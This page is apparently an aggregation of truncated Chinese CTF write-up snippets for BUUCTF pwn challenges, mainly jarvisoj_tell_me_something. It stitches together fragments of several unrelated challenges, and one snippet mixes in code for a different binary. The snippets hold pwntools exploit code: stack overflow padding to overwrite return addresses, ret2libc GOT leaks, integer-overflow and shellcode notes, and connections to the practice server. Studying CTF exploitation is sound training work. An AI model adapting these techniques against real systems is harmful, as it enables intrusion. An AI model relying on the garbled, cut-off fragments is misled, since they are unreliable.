[BUUCTF]PWN——jarvisoj_tell_me_something

那就很简单了，溢出指向漏洞函数即可，但此题有个小坑，其实最开始学pwn时会通过gdb查找溢出大小，但后面懒了就直接通过IDA查看，但IDA并不一定准确，并且题目本身也会有坑，比如该题。但本题，main函数没有push ebp的操作，所有溢出时不需要多加8字节ebp位置。

BUUCTF 做题练习

pwn新手小白，写完题后整理的一点点思路，有借鉴其他wp，有任何问题各位师傅可以提出，接收批评指正

good_game()的地址：0x400620。存在足够的溢出长度，调用后门函数！

BUUCTF：jarvisoj_tell_me_something0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 仅开启了栈不可执行保护 0x02 运行 只是输入一条message 0x03 IDA good_game函数将flag.txt内容输出 0x04 思路 是一道简单的栈溢出题，知道覆盖长度即可，gdb调试 发现输入message的地址到返回地址的长度为0x88字节 0x05 exp #!/usr/bin/python

[BUUCTF-pwn]——jarvisoj_tell_me_something 题目地址： https://buuoj.cn/challenges#jarvisoj_fm 点击一下writeup 在这里 以前写过所以偷懒一下， 嘿嘿嘿！！！ 各位师傅不要见怪呀 ????

64位程序，开启了NX保护 400620 from pwn import * r=remote('node4.buuoj.cn',29273) flag_addr=0x400620 payload='a'*(0x88)+p64(flag_addr) r.sendline(payload) r.interactive() 这道题需要注意的一点是没有返回 这是其栈结构 所以这道题直接溢出0x88即可 ...

read有栈溢出flag.txt进行栈溢出将返回地址覆盖为fopen函数地址。

main函数： int __cdecl main(int argc, const char **argv, const char **envp) { __int64 v4; // [rsp+0h] [rbp-88h] write(1, "Input your message:\n", 0x14uLL); read(0, &v4, 0x100uLL); return wri...

水题，栈溢出返回到good_game就行了，要注意这题没有bp from pwn import * from LibcSearcher import * local_file = './guestbook' local_libc = '/lib/x86_64-linux-gnu/libc-2.23.so' remote_libc = './libc-2.23.so' select ...

[第五空间2019 决赛]PWN5 例行检查，32位，开启了canary保护和NX保护。 运行一下。 IDA打开，看到了/bin/sh,但开启了保护 查看主函数，函数的功能是读入一个4位的随机密码，再将我们输入的密码与随机生成数比较，相同就执行system 这里面的printf（）存在格式化字符串漏洞 按我的理解就是输入的参数的个数是不固定的，是由前面的格式化字符串决定的，所以我们只要控制了前面的格式化字符串，再结合一些参数，后面输出什么就是由我们决定的；如： %d 用于读取10进制数值 %x

jarvisoj_level2_x64 例行检查 ，64位，开启NX保护， 运行一下 用IDA打开。 systemaddr=0x40063e shalladdr=0x400A90 查看主函数，buf的长度为0x80,读取的长度为0x200，可以造成溢出漏洞。 rdiaddr= 0x4006b3 from pwn import * context(log_level = 'debug') elf = ELF('./level2_x64') p = remote('node3.buuoj.cn',

jarvisoj_level3 32位，NX保护。 运行程序。 用IDA打开，shift+f12检索 ，找到关键函数。 参数buf溢出漏洞，利用ret2libc获取shell。 1，利用write函数泄露libc版本 write_plt=elf.plt['write'] write_got=elf.got['write'] payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4) r.recvuntil('

bjdctf_2020_babystack2 64位，开启NX保护。 运行一下。 用IDA打开。找到了后门函数。backdoor=0x400726 查看main函数 读入数据的大小由我们输入的参数nbytes控制 nbytes参数的类型 是 size_t，它是一个无符号整型。 但是第7行又将它转换成了有符号的整型，存在整数溢出漏洞（即无符号的数转换成有符号的整型后超过了有符号的整型能表示的范围，从而造成溢出，常用-1来造成溢出） from pwn import * r=remote('nod

picoctf_2018_buffer overflow 2 例行检查，32位，开启NX保护 运行一下， 用IDA打开。看到了flag.txt，跟进一下。 win函数地址为0x80485cb a1 == 0xDEADBEEF && a2 == 0xDEADC0DE 时，输出flag. from pwn import* r=remote('node3.buuoj.cn',26224) payload='a'*(0x6c+4)+p32(0x80485cb)+p32(0)+p32(0x

ciscn_2019_s_9 参考 例行检查 ，32位，未开启任何保护 运行一下。 32位ida载入，，第10行的fgets，能够溢出0x32-0x20-0x4个字节 没用nx保护，首先想到的就是往s里写入shellcode，然后跳转到s执行shellcode 生成的shellcode的长度过长，参数 s0x20(32) 写不下。 shellcode =''' xor eax,eax #eax置0 xor edx,edx #edx置0 push edx #将0入栈，标

warmup_csaw_2016 例行检查 ，64位，无保护 运行一下,没什么信息。 用64位IDA打开，查看字符串,看到了cat flag，进去瞧瞧 可以看到这个函数的功能就是输出flag，记录下他的地址 flag_addr=0x40060D 再回到主函数瞧瞧,可以看到最后是输出了v5，gets函数并没有限制长度，因此存在溢出漏洞。v5的大小是0x40，因此只要我们输入的字符串长度=0x40+8（64位ebp的长度）即可溢出到返回地址,再将返回地址覆盖输出flag的那个函数地址即可 得到fla